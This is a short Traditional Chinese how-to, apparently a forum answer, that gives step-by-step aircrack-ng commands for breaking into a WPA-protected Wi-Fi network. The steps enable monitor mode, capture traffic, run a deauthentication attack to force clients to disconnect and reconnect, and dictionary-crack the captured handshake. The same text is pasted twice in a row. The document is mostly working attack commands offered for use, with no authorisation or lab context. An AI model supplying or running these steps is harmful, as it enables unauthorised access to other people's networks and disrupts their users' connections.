可以的。
步驟如下:
0、進入Terminnal
1、開始監控wlan(airmon-ng是BT5的工具)
airmon-ng start wlan0
2、開始抓包(test為抓到的包的檔案命名)
airodump-ng -w test mon0
3、監控制定通道(-c後跟的引數是哪個頻道)
airodump-ng -c 11 -w test mon0
4、Deauth攻擊(-0後跟的引數是攻擊次數)
這個操作主要是偽造資料包使客戶端與無線路由器斷鏈,從而重連,因此我們可以截獲到中間的資料包)
aireplay-ng -0 5 -a MAC地址(BSSID) -c MAC地址(STATION) mon0
5、出現WPA handshake欄位
6、開始指定字典進行破解(-w後跟的是字典路徑,test-*.cap是指前面截獲到的資料包)
aircrack-ng -w /pentest/passwords/wordlists/yeslab.lst test-*.cap
7、完成。
可以的。
步驟如下:
0、進入Terminnal
1、開始監控wlan(airmon-ng是BT5的工具)
airmon-ng start wlan0
2、開始抓包(test為抓到的包的檔案命名)
airodump-ng -w test mon0
3、監控制定通道(-c後跟的引數是哪個頻道)
airodump-ng -c 11 -w test mon0
4、Deauth攻擊(-0後跟的引數是攻擊次數)
這個操作主要是偽造資料包使客戶端與無線路由器斷鏈,從而重連,因此我們可以截獲到中間的資料包)
aireplay-ng -0 5 -a MAC地址(BSSID) -c MAC地址(STATION) mon0
5、出現WPA handshake欄位
6、開始指定字典進行破解(-w後跟的是字典路徑,test-*.cap是指前面截獲到的資料包)
aircrack-ng -w /pentest/passwords/wordlists/yeslab.lst test-*.cap
7、完成。